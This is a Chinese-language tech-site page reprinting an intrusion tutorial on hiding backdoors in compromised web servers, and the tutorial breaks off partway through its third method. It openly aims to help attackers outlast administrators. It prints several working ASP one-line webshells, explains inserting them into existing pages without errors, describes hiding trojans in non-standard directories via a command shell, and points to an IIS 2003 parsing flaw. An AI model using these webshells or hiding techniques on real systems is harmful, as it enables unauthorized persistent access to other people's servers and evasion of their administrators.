扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
相信很多朋友们都有入侵留下的后门被删的情况吧,今天我写这篇文章就是教大家如何制作自己的隐藏后门,与管理员斗争到底````
文章主要讲解两方面的后门隐藏技术,web or server…
先说说webshell的隐藏吧:
比较笨的方法就是找一些比较深或者比较隐蔽的地方放自己的ASP木马,这个就不用我说了吧。
下面这些方法,只要大家利用好,做个隐藏的ASP后门是不成问题的。
1.插马法:其实,我们可以直接把一句话插入已经存在的页面了,但是,问题出来了,像常用的:<%execute(request("a"))%> <%execute(request("value"))%><%eval request("#")%><%if request("cnxhacker")<>"" then Session("b")=request("cnxhacker")
if Session("b")<>"" then execute Session("b")%>等等,这些一句话一插进去的话,就会报错,一下就会被发现…其实,我们忽略了一个天天在用的S端:
冰狐的一句话客户端,这个调用的是Javascript脚本,跟调用Vbscript不同,Javascript是运行在客户端的,也就上一HTML端,所以我们可以直接把他插入在页面中,而不报错。这样,就达到了隐藏后门的技术。(建议大家找个比较大的页面,随便插在,,这些标签后门都可以的)
2.建立非标准目录:这个只要有CMDshell 就可以了,当然提权最好。直接在站点跟目录下建立个文件夹,DOS法:md adai 然后在拷贝自己的木马到这个目录下,比如木马在d:\web\wind.asp 就把他拷贝到d:\web\adai\wind.asp 这样,也可以起到隐藏作用。
3.include调用法:知道最近出了个动易的ODAY么,就是利用03服务器的IIS解析的漏洞,我给大家讲解下,03服务器会对asp的文件进行解析,这样就可以达到我们隐藏后门的技术了,大家会经常看到:[an error occurred while processing this directive]
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者